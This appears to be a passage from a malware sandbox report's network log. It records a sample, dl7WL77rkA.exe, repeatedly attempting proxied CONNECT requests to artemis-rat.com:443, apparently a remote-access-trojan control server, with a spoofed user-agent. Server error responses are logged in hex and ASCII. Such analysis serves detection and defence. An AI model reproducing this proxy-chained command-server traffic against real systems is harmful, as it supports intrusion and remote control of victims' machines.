                                                                                                                                                                                                                                                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: Maximum number of open connections reached.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            200192.168.2.55046138.162.4.6931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.470544100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.884592056 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            201192.168.2.550398177.12.118.160803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.470544100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.797940016 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            202192.168.2.5504135.252.23.22010813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.470746040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            203192.168.2.550417185.225.232.191803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.470746040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.453131914 CET805INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.57 (Debian)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.57 (Debian) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            204192.168.2.550520104.18.136.28803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.471976995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.626490116 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            205192.168.2.55043113.37.59.9931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.471976995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.773873091 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            206192.168.2.5504715.161.103.113803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.472050905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.687274933 CET327INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            207192.168.2.550526104.19.79.238803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.472136974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.626506090 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            208192.168.2.5504018.219.97.248803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.472137928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.806983948 CET733INHTTP/1.1 504 Gateway Time-out
                                                                                                                                                                                                                                                            Server: Tengine
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:48 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 581
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 69 7a 74 34 6e 66 33 77 73 39 30 37 62 63 79 6e 6a 71 6e 77 77 38 7a 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 34 2f 30 33 2f 31 31 20 31 30 3a 33 30 3a 34 38 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://artemis-rat.com</td></tr><tr><td>Server:</td><td>izt4nf3ws907bcynjqnww8z</td></tr><tr><td>Date:</td><td>2024/03/11 10:30:48</td></tr></table><hr/>Powered by Tengine<hr><center>tengine</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.012470961 CET733INHTTP/1.1 504 Gateway Time-out
                                                                                                                                                                                                                                                            Server: Tengine
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:48 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 581
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 69 7a 74 34 6e 66 33 77 73 39 30 37 62 63 79 6e 6a 71 6e 77 77 38 7a 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 34 2f 30 33 2f 31 31 20 31 30 3a 33 30 3a 34 38 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://artemis-rat.com</td></tr><tr><td>Server:</td><td>izt4nf3ws907bcynjqnww8z</td></tr><tr><td>Date:</td><td>2024/03/11 10:30:48</td></tr></table><hr/>Powered by Tengine<hr><center>tengine</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            209192.168.2.550531203.28.9.107803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.472522974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.628479004 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            210192.168.2.55044538.162.1.9331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.473129988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.894562006 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            211192.168.2.550544104.17.210.9803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.482876062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.637515068 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
